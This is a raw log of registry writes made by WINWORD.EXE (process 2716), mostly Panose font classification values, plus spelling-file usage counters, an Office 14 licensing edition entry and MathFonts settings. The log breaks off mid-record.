WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
02020600040205080304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
02000500030200090000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
02000504070300020003
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
02020602070100000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
020B0504020000000003
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
020B0702040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
02010600030101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
02010609030101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
02010609030101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
03000500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
02000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
02000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
020B0100010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
03020402040406030203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
02070309020205020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
02000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
02010803020104030203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
020E0502060401010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
020E0503060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
02010502060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
020B0502050101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
020B0509050101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
020E0502050101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
02030509050101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
020B0304020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
03000509000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
03000509000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
020B0602030504020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
020B0A04020102020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
020E0502030303020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
030F0702030302020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
020B0609020204030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
02030602050306030303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
020B0503020204020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
020B0603020102020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
04040605051002020D02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
02040502050405020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
02040502050505030304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
02000600000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
020B0603020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
05030102010509060703
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
05050102010205020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
05020102010507070707
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
05040102010807070707
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
02040602050305030304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
020B0502020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
020B0706040902060204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
05010100010000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
020B0606020202030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
02020404030301010803
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
03010101010201010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
04020705040A02060702
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
02020602080505020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
04030905020B02020C02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
02020503060305020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
020E0602020502020306
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
02050806060905020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
02070706080601050204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
020B0903060703020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
04040905080B02020502
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
03060802040406070304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
0207040306080B030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
02030504050205020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
04020404031007020602
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
04020805060202030203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
0208090404030B020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
0204060206030A020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
030804020302050B0404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
04030604020F02020D02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
04040505050A02020702
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
02040502050506030303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
04090605060D06020702
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
04040403040A02020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
03050502040202030202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
030304020206070D0D06
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
02040602050505020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
03010101010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
02060602050505020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
03010101010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
04030805050802020D02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
03020802060602070202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
03090702030407020403
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
02070704070505020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
04020502070703030202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
04020502070702020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
03040902040508030806
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
04050602080702020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
03040602040708040804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
040506030A0602020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
02080502050505020702
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
04040805050809020602
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
030604020304060B0204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
04020904020102020604
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
04040A07060A02020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
040409050D0802020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
04020404030D07020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
03070502030502020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
03020602050506090804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
03050402040407070305
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
020A0A07050505020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
020B0602020104020603
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
020B0606020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
03040602040607080904
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
02060903040505020403
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
02060603050405020104
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
02060603020205020403
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
03070502040507070304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
03060402040406080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
02020502060505020804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
02020502060401020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
03070502060502030205
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
030303020206070C0B05
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
02010509020102010303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
020E0502030308020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
020B0509030504030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
020B0602030504020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
04020605060303030202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
0202090407030B020401
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
02020502050305020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
02030808020601010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
020B0A06020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
020B0A02020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
020B0506020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
020B0502020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
020B0902020104020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
04040504061007020D02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
03020402040607040605
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
020B0606030402020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
020B0903020102020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
020B0706030402020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
020B0703020102020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
020B0503020102020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
03060902040502070203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
04060505060202020A04
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
020B0602030504020804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
020B0402030504020804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
020B0805030504020804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
020B0907030504020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
02090707080505020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
02020904090505020303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
030303020407070D0804
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
04040404050702020202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
020E0507020206020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
020E0705020206020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
02040604050505020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
020A0402060406010301
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
02040603050505030304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
03070402050302030203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
02050604050505020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
02070606080606020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
02070A03080606020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
02070603080606020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
04020505051007020D02
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
020F0704030504030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
020B0503020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
05010101010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
05000500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
020E0802020502020306
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
020B0803020202020204
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992233
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992234
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992233
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992234
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992254
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992255
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992235
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1321992236
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992235
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1321992236
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992256
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1321992257
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
